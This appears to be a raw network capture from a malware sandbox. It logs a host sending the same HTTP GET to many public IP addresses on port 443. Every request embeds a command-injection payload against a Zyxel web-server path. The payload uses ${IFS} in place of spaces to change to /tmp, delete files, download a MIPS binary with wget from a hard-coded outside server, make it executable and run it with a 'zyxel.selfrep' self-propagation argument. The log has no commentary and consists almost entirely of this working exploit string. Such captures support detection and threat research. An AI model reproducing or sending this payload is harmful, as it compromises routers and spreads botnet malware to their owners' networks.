                                                  Jan 19, 2024 18:23:56.061585903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4513192.168.2.1349288216.211.196.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061634064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4514192.168.2.1337574140.44.228.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061662912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4515192.168.2.1350448122.44.244.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061713934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4516192.168.2.1344292129.62.36.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061737061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4517192.168.2.1342768131.123.198.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061769962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4518192.168.2.1349812197.73.169.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061808109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4519192.168.2.135178250.5.158.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061831951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4520192.168.2.1332834134.32.142.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061883926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4521192.168.2.133475451.170.28.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061928034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4522192.168.2.133340449.156.167.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061949968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4523192.168.2.1342510123.64.89.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.061983109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4524192.168.2.134987494.34.184.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062052011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4525192.168.2.1338000217.178.138.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062083960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4526192.168.2.1347948192.11.65.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062124968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4527192.168.2.133822678.172.33.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062177896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4528192.168.2.134465054.237.180.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062210083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4529192.168.2.135127882.29.244.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062237978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4530192.168.2.1356058206.76.159.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062268972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4531192.168.2.135023453.51.144.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062314987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4532192.168.2.135974835.50.148.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062346935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4533192.168.2.133726634.213.191.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062403917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4534192.168.2.135701613.0.49.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062449932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4535192.168.2.134647894.245.46.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062474012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4536192.168.2.135964262.150.38.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062499046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4537192.168.2.133635271.121.24.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062560081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4538192.168.2.1359352150.157.29.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062603951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4539192.168.2.134119034.159.154.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062628984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4540192.168.2.135499499.210.141.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062652111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4541192.168.2.1340304118.24.218.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062693119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4542192.168.2.1346358201.152.211.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062743902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4543192.168.2.1334860156.56.116.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062767982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4544192.168.2.1347320101.254.213.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062814951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4545192.168.2.135532240.118.154.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062845945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4546192.168.2.134827045.193.111.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062886953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4547192.168.2.133873237.153.222.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062911987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4548192.168.2.1348936109.66.170.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062954903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4549192.168.2.13445362.96.54.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.062997103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4550192.168.2.134883259.204.93.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063050985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4551192.168.2.134385067.151.22.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063081980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4552192.168.2.1340702207.198.138.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063137054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4553192.168.2.1336016218.134.56.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063177109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4554192.168.2.135248268.199.32.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063211918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4555192.168.2.134345637.111.187.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063257933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4556192.168.2.13428649.105.72.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063292980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4557192.168.2.1341178109.62.107.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063338995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4558192.168.2.1350270100.30.110.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063378096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4559192.168.2.1354856164.6.237.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063427925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4560192.168.2.1339434174.72.15.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063472986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4561192.168.2.1333662183.187.248.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063523054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4562192.168.2.1344548222.56.254.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063554049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4563192.168.2.135436063.174.67.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063590050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4564192.168.2.1356644101.14.25.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063631058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4565192.168.2.135322253.209.16.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063657999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4566192.168.2.1351290117.185.93.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063711882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4567192.168.2.1360442220.18.221.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063740969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4568192.168.2.1355592174.239.106.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063771009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4569192.168.2.135744460.207.1.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063801050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4570192.168.2.1338958212.117.64.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063828945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4571192.168.2.133740065.87.38.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063867092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4572192.168.2.133531666.5.166.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.063913107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4573192.168.2.134924669.159.201.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.067089081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4574192.168.2.134547641.145.229.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.067461967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4575192.168.2.1345974106.115.43.76443
                                                  TimestampBytes transferredDirectionData
